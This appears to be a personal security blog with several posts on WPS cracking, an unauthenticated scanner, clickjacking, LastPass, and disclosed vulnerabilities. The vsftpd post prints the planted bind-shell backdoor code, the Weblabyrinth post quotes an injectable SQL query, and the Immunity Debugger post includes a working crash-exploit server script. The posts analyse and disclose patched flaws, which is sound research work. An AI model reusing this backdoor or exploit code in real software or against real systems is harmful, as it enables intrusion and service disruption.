WPA Cracking Using WPS

There was a new tool posted yesterday over on /dev/ttyS0, Reaver that takes advantage of the WPS specification, exploiting an inherent weekness in to retrieve an access points WPA/WPA2 shared key in a matter of hours.

The tool is very simple to use, taking just a BSSID as a parameter, and attempting to bruteforce the WPS pin on an access point, however there are reports (including one from myself) of issues getting the tool to work with certain drivers, but hopefully these will be fixed soon.

This is a very exciting attack, as WPS is enabled by default on many AP’s, including many that do not automatically update firmware, meaning that this attack will be around for a while.

For this tool, and information on how the exploit is performed, visit the /dev/ttyS0 blog here, as well as the original auther of the vulnerabilitity .braindump here.

As for how to protect yourself against this attack….. just disable WPS 🙂

Advertisements

Scanning for Fun and Profit

Today I purchased a new printer for my home office, a HP Deskjet 3070a (mostly because of my wife’s persistence on having an iPad compatible printer). This wireless printer is typical amongst those found in homes today, offering WiFi connectivity and internet enabled printing, but the thing that struck me was just how this tech worked from a security perspective, after all, with unsecured Wifi networks unfortunately common in neighbourhoods, just what could an attacker do with a printer / scanner?

The first thing that I did was fire up Wireshark to see exactly how my laptop communicated with the scanner over the network. I half expected to see some proprietary communication between the driver and the printer, but no, the scanner actually uses standard unencrypted HTTP and XML to send job information and retrieve information on the scanner. Perhaps the most alarming (but unfortunately not unexpected) feature was the lack of any authentication when communicating.

I was quickly able to create a simple tool for retrieving a scanned document from the scanner which I have published here. This small tool simply sends enough information to request a raw image from the scanner, using Python Imaging Library to convert this to a bitmap. It’s a bit flaky at best, but it helps prove the point that if an attacker is able to access your wireless network, even something as innocent as your printer / scanner combo may be at risk. You may wish to think twice about what you leave on your scanner glass.

ClickJacking – A Demonstration Of An Ongoing Problem

After coming across a couple of news sites reporting on ClickJacking this afternoon, I decided create a post that would demonstrate just how easily ClickJacking is done. Please be aware that this post is very high level, and not an in-depth look at the attack vector. The hope for this post is that you can demonstrate to your friends / family just how easy it is to be caught out.

Due to the content of the post, I have put the content on a separate page: http://www.xpnsbraindump.com/p/clickjacking-demonstration-of-ongoing.html
(By the way, the irony of clicking this a link to go to a page about clickjacking is not lost on me 😀 If you are unsure, please just copy the above link).

Vsftpd Backdoor Discovered

As you may have seen, there was a backdoor planted within version 2.3.4 of Vsftpd. Along with the announcement came confirmation from Chris Evans that Vsftpd’s hosting would be moved to Google.

The backdoor trigger was planed within ‘str.c’:



else if((p_str->p_buf[i]==0x3a)
&& (p_str->p_buf[i+1]==0x29))
{
vsf_sysutil_extra();
}

As you can see, the code searches for bytes 0x3a and 0x29: or ‘:)’ for those who don’t like ASCII.

The vsf_sysutil_extra(); function is then inserted into sysdeputil.c as:


int vsf_sysutil_extra(void)
{
int fd, rfd;
struct sockaddr_in sa;
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6200);
sa.sin_addr.s_addr = INADDR_ANY;
if((bind(fd,(struct sockaddr *)&sa,
sizeof(struct sockaddr))) < 0) exit(1);
if((listen(fd, 100)) == -1) exit(1);
for(;;)
{
rfd = accept(fd, 0, 0);
close(0); close(1); close(2);
dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
execl("/bin/sh","sh",(char *)0);
}
}

Quite a simple and obvious backdoor, with no real attempt made to obscure the payload. This simply binds to port 6200 and listens forever, accepting connections and spawning a shell.

LastPass Security Issue

Recently I heard about the LastPass security issue that had been posted on their blog here

First, I should applaud LastPass in their open nature regarding ‘suspected’ security vulnerabilities. I believe that they have dealt with this issue well and in recent times, we all know of the issues that delaying security information can have (ahem *Sony*)

Saying that, today I came to re-install Windows 7 on my laptop, and installed the LastPass Chrome plugin. Trying to authenticate to my twitter account, I came across a problem, so I checked out the LastPass.com website for any updates, and was asked to enter my email address for an activation link to be sent.

It seems from the LastPass blog post that this is a temporary solution to mitigate the high volume of traffic that they were receiving of people resetting passwords.

This pointed out a huge issue for me: How could I log into my email’s to authenticate my LastPass account, when I couldn’t access LastPass to retrieve my email password?

Of course, there are other ways around this (such as using LastPass pocket or another locally stored LastPass database), but in a world Cloud Computing, where Amazon backs up your data, Google stores your blog, LastPass stores your security credentials, PayPal stores your finances, and Flickr stores your family photos, is our reliance on Cloud Computing not as fruitful as first thought?

Weblabyrinth

For all of you listeners of pauldotcom’s security podcast, you may have heard about a recent technical segment on Weblabyrinth, a PHP program that tags itself as:

“A system that creates a bogus web structure to entrap and delay web scanners”

Basically, Weblabyrinth uses a .htaccess file to redirect non-existing page requests to itself, and then logs the access in a database and/or IDS. This helps administrators to identify anyone using an automated Web Scanner on their website.

Interested in anything that helps to add further security protection, and being a big fan of the show, I decided to check it out. After a bit of studying, it became apparent that there was a blatant SQL injection vulnerability present within the labyrinth.inc.php file.

I have logged a bug with the developers today to have these SQL injection attacks fixed, but it just goes to show that you should always be auditing scripts before deploying.

[ Edited 09/05/11 ]

Today I received an email from a Weblabyrinth developer confirming my security bug which will be fixed in version 0.3.2, I will update the post once this has been updated]

[ Edited 13/05/11 ]

It looks like the fix has gone live for Weblabyrinth 0.3.2 which fixes a SQL injection attack that I discovered:


$this->dbhandle->query("SELECT crawler_ip FROM crawlers WHERE crawler_ip='$ip' AND crawler_useragent='$useragent'");

Fast work by the team, and good communication.

Immunity Debugger Buffer Overflow (NGS00016)

Another trawl through BugTraq, another cool vulnerability.

Today, it’s a buffer overflow with Immunity Debugger (version 1.73). This caught my interest because I love the idea of finding a vulnerability in a Debugger, with the same Debugger 😀

Before I start, I should say that this has now been fixed in the latest version which should be downloaded from Immunity’s site.

The original report on BugTraq came from Paul Harrington with a description of:

Immunity Debugger V1.73 contains a buffer overflow vulnerability in its HTTP update mechanism

So, we now know that we have a vulnerability with the update mechanism, using the HTTP protocol.

First thing we do is fire up Wireshark to see the data being sent to and from the Debugger. From everything that is sent via HTTP, the most interesting is the following request:


The reason this looks interesting is by looking at the response, we can see where a buffer overflow may occur when reading in strings.


Next, we want to redirect all traffic sent to http://auth.immunitydebugger.com so we can build a working exploit. This is easily done by editing out ‘hosts’ file to something like:


# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost

127.0.0.1 auth.immunityinc.com

This will send any traffic for ‘http://auth.immunityinc.com&#8217; to 127.0.0.1

I created a simple (and dirty) python script to send a HTTP response with malformed data:


import sys
import socket

class immunity_debugger_exploit:
port = 80
_bind_socket = 0
_client_socket = 0
_client_addr = ""
_server_running = True

_evil_string = "HTTP/1.1 200 OK\r\nDate: Tue, 22 March 2011 17:43:53 GMT\r\nServer: Apache\r\nContent-Type: text/plain\r\n\r\n\n!\n%FUBAR_NAME&" + ("A" * 1000000)

def __init__(self, port):
self.port = port

def start_listener(self):

try:
self._bind_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
self._bind_socket.bind(("0.0.0.0", self.port))
self._bind_socket.listen(5)

while self._server_running:
(self._client_socket, self._client_addr) = self._bind_socket.accept()
self._send_vuln()

self._bind_socket.close()

except Exception as e:
print "An Error Occured Binding To Port " + str(self.port)

def _send_vuln(self):
data = self._client_socket.recv(9076)

if data[:44] == "POST /ImmunityDebugger/ID_getads.py HTTP/1.1" or data[:43] == "GET /ImmunityDebugger/ID_getads.py HTTP/1.1":
print "[X] Received Request For /ImmunityDebugger/ID_getads.py"
self._client_socket.send(self._evil_string)
print "[X] Malformed Reply sent, client should have crashed"
self._server_running = False

self._client_socket.close()


if __name__ == "__main__":
print " Immunity Debugger (v1.73) HTTP DOS exploit"
print " http://xpnsbraindump.blogspot.com"

leet_exploit = immunity_debugger_exploit(80)
leet_exploit.start_listener()

Sure enough, we have a our crash which shows that our list of ‘AAAA’s has had an effect on Immunity Debuggers run.


Digging into the disassembly, you can see that the vulnerable function is just a simple “rep movs” op which doesn’t do correct bounds checking.


To build a Remote Code Exec exploit for this program could well be possible, but not quite as easy as using a SEH overwrite. This is because only a finite amount of data is read during the retrieval of the HTTP data.


It may be possible by cleverly overwriting memory locations, but to be honest, the window of opportunity of pulling off a successful exploit is not worth the hassle, it’s just about having fun !